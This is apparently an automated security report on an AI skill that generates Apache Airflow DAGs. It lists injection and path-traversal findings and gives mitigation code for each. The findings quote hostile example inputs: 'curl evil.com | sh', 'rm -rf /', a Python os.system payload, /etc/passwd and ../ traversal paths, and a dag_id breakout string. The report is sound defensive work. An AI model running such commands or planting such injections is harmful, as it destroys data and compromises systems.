Trust Assessment
airflow-dag received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 6 findings: 2 critical, 2 high, 2 medium, and 0 low severity. Key findings include "Missing required field: name", "Arbitrary Bash Command Injection in Generated DAG", and "Arbitrary Python Code Execution in Generated DAG".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 3/100, reflecting the injection and path-traversal findings detailed below.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (6)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Arbitrary Bash Command Injection in Generated DAG.** The `add_bash_task` method allows a user to provide an arbitrary `command` string. This string is directly interpolated into the `bash_command` parameter of an Airflow `BashOperator` within the generated Python code. A malicious user could inject shell commands (e.g., `rm -rf /`, `curl evil.com \| sh`) which would be executed by the Airflow worker when the DAG runs. This constitutes a severe command injection vulnerability. The `bash_command` should be sanitized or validated to prevent arbitrary command execution. If arbitrary commands are intended, the skill should explicitly warn the user about the security implications and potentially restrict the execution environment (e.g., a container with minimal privileges). For common use cases, consider a more structured way to define commands or a safer operator if available. Escaping quotes or disallowing certain characters in the input `command` string is crucial. | LLM | SKILL.md:160 |
| CRITICAL | **Arbitrary Python Code Execution in Generated DAG.** The `add_python_task` and `add_branch_task` methods allow a user to provide a `python_callable` string. This string is directly interpolated into the `python_callable` parameter of an Airflow `PythonOperator` or `BranchPythonOperator` within the generated Python code. A malicious user could inject arbitrary Python code (e.g., `__import__('os').system('rm -rf /')`) which would be executed by the Airflow worker when the DAG runs, allowing arbitrary code execution. The `python_callable` string should be strictly validated to ensure it refers to a safe, pre-defined function or module path rather than allowing arbitrary code. If dynamic Python execution is required, consider a sandboxed execution environment or a whitelist of allowed callables. Direct interpolation of user-controlled code is highly dangerous. | LLM | SKILL.md:169 |
| HIGH | **Arbitrary File Path Access in Generated DAG.** The `add_sensor_task` method allows a user to provide an arbitrary `filepath` string. This string is directly interpolated into the `filepath` parameter of an Airflow `FileSensor` within the generated Python code. A malicious user could specify paths outside the intended data directories (e.g., `/etc/passwd`, `../../sensitive_data.txt`) to monitor the existence of sensitive files, potentially aiding in data exfiltration or reconnaissance. While `FileSensor` only checks for existence, it can be used to confirm paths or trigger other malicious tasks based on sensitive file presence. Validate the `filepath` to ensure it adheres to expected patterns (e.g., starts with `/data/input/`) and does not contain path traversal sequences (`..`). Consider a whitelist of allowed directories or a robust path sanitization library to restrict file access. | LLM | SKILL.md:175 |
| HIGH | **Arbitrary File Write Location via `save_dag`.** The `save_dag` method allows a user to specify an arbitrary `output_path` for the generated DAG file. A malicious user could specify paths outside the intended `/airflow/dags/` directory (e.g., `../../sensitive_config.py`) to overwrite critical system files or other application files, leading to denial of service, privilege escalation, or other system compromise. Validate the `output_path` to ensure it is within an allowed, restricted directory (e.g., `/airflow/dags/`) and does not contain path traversal sequences (`..`). Enforce a strict whitelist or pattern matching for the output path. | LLM | SKILL.md:189 |
| MEDIUM | **Missing required field: name.** The `name` field is required for claude_code skills but is missing from the frontmatter. Add a `name` field to the SKILL.md frontmatter. | Static | skills/datadrivenconstruction/airflow-dag/SKILL.md:1 |
| MEDIUM | **Potential Code Injection via `dag_id` or `schedule`.** The `dag_id` and `schedule` parameters are directly interpolated into the generated DAG code using f-strings without explicit escaping. While these are typically simple strings, a sophisticated attacker might attempt to inject Python code or manipulate the generated DAG structure by carefully crafting these strings (e.g., `dag_id='my_dag', default_args=evil_args, schedule_interval='@daily'`). Although less direct than `bash_command` or `python_callable`, this is a potential vector for code manipulation if not properly sanitized. Ensure that `dag_id` and `schedule` strings are escaped or validated to prevent injection of quotes or other characters that could break out of the string literal. For `dag_id`, enforce strict naming conventions (e.g., alphanumeric and underscores only). For `schedule`, validate against known cron patterns or Airflow schedule presets. | LLM | SKILL.md:140 |
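The bash-injection finding recommends escaping or disallowing shell metacharacters before interpolating user input into `bash_command`. A minimal sketch of that mitigation, assuming the DAG generator separates the program name from its arguments (the helper `safe_bash_command` is hypothetical, not part of the skill):

```python
import re
import shlex

def safe_bash_command(program: str, *args: str) -> str:
    """Build a bash_command string for a BashOperator: the program name is
    checked against a conservative pattern, and every user-supplied argument
    is quoted with shlex.quote so shell metacharacters (;, |, $, backticks)
    are treated as literal text rather than executed."""
    if not re.fullmatch(r"[\w./-]+", program):
        raise ValueError(f"suspicious program name: {program!r}")
    return " ".join([program] + [shlex.quote(a) for a in args])
```

For example, `safe_bash_command("echo", "a; rm -rf /")` yields `echo 'a; rm -rf /'`, so the injected `rm` runs as literal text, while a program name like `curl evil.com | sh` is rejected outright.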
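The Python-code-execution finding recommends a whitelist of allowed callables instead of interpolating user-supplied code into `python_callable`. One way to sketch that, where the allow-list keys and dotted paths are purely illustrative (this mapping is not part of the skill):

```python
# Hypothetical allow-list: user input selects a task by short name, and the
# generated DAG only ever references these vetted dotted import paths.
ALLOWED_CALLABLES = {
    "extract": "my_project.tasks.extract",
    "transform": "my_project.tasks.transform",
    "load": "my_project.tasks.load",
}

def resolve_callable(name: str) -> str:
    """Map a user-supplied task name to a vetted dotted import path.
    Arbitrary code such as "__import__('os').system(...)" is rejected
    simply because it is not a key in the allow-list."""
    try:
        return ALLOWED_CALLABLES[name]
    except KeyError:
        raise ValueError(
            f"unknown callable {name!r}; allowed: {sorted(ALLOWED_CALLABLES)}"
        ) from None
```

The design choice here is that user input never reaches the generated source as code, only as a dictionary key, which removes the injection surface entirely.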
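Both path findings (`filepath` for `FileSensor` and `output_path` for `save_dag`) come down to confining a user-supplied path under a fixed root. A minimal sketch for the `save_dag` case, assuming the `/airflow/dags/` root mentioned in the finding (the function name is hypothetical; requires Python 3.9+ for `Path.is_relative_to`):

```python
from pathlib import Path

DAGS_ROOT = Path("/airflow/dags")  # assumed deployment convention

def validated_output_path(output_path: str) -> Path:
    """Resolve the requested path relative to the DAG folder and refuse
    anything that escapes it, which defeats traversal sequences such as
    '../../etc/passwd' even when they are disguised by nesting."""
    candidate = (DAGS_ROOT / output_path).resolve()
    if not candidate.is_relative_to(DAGS_ROOT):
        raise ValueError(f"{output_path!r} escapes {DAGS_ROOT}")
    if candidate.suffix != ".py":
        raise ValueError("DAG files must end in .py")
    return candidate
```

The same resolve-then-check pattern applies to the `FileSensor` `filepath`, with the root swapped for the intended data directory (e.g., `/data/input/`).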
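Finally, the `dag_id`/`schedule` finding calls for strict naming conventions and schedule validation before f-string interpolation. A hedged sketch, where the function names and the preset set are assumptions rather than the skill's actual API (the `dag_id` rule here is deliberately stricter than Airflow's own):

```python
import re

# Standard Airflow schedule presets accepted as-is.
SCHEDULE_PRESETS = {"@once", "@hourly", "@daily", "@weekly", "@monthly", "@yearly"}

def validate_dag_id(dag_id: str) -> str:
    """Restrict dag_id to identifier-style names so a crafted value
    cannot break out of the generated f-string and inject code."""
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]{0,249}", dag_id):
        raise ValueError(f"invalid dag_id: {dag_id!r}")
    return dag_id

def validate_schedule(schedule: str) -> str:
    """Accept an Airflow preset or a plausible 5-field cron expression;
    anything containing quotes or other code-breaking characters fails."""
    if schedule in SCHEDULE_PRESETS:
        return schedule
    if re.fullmatch(r"[\d*/,\- ]+", schedule) and len(schedule.split()) == 5:
        return schedule
    raise ValueError(f"invalid schedule: {schedule!r}")
```

With these checks, an input like `my_dag', default_args=evil_args, schedule_interval='@daily` is rejected before it ever reaches the code generator.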
Full report: https://skillshield.io/report/6cc090612368b015